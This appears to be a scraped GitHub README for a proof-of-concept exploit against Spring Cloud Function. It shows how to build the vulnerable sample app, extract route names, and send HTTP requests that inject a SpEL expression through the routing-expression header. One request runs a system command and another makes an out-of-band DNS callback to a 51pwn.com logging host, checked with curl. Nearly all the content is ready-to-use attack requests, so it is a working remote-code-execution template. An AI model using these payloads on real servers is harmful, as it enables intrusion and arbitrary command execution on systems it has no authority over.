spring-spel-0day-poc

spring-cloud/spring-cloud-function RCE EXP POC https://github.com/spring-cloud/spring-cloud-function header

spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a calculator.app")

build

wget https://github.com/spring-cloud/spring-cloud-function/archive/refs/tags/v3.1.6.zip
unzip v3.1.6.zip
cd spring-cloud-function-3.1.6
cd spring-cloud-function-samples/function-sample-pojo
mvn package
java -jar ./target/function-sample-pojo-2.0.0.RELEASE.jar

get path lists for test

find . -name "*.java"|xargs -I % cat %|grep -Eo '"([^" \.\/=>\|,:\}\+\)'"'"']{8,})"'|sort -u|sed 's/"//g'

...
functionRouter
uppercase
lowercase
...

poc1

POST /functionRouter HTTP/1.1
host:127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Connection: close
spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a /System/Applications/Calculator.app")
Content-Length: 5

51pwn

poc2

POST /functionRouter HTTP/1.1
host:127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Connection: close
spring.cloud.function.routing-expression:T(java.net.InetAddress).getByName("random87535.rce.51pwn.com")
Content-Length: 5

51pwn

check

curl -v 'https://51pwn.com/dnslog?q=random87535.rce.51pwn.com'

Name		Name	Last commit message	Last commit date
Latest commit History 10 Commits
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

spring-spel-0day-poc

build

get path lists for test

poc1

poc2

check

About

Releases

Packages

WZD-MI/spring-spel-0day-poc

Folders and files

Latest commit

History

Repository files navigation

spring-spel-0day-poc

build

get path lists for test

poc1

poc2

check

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Packages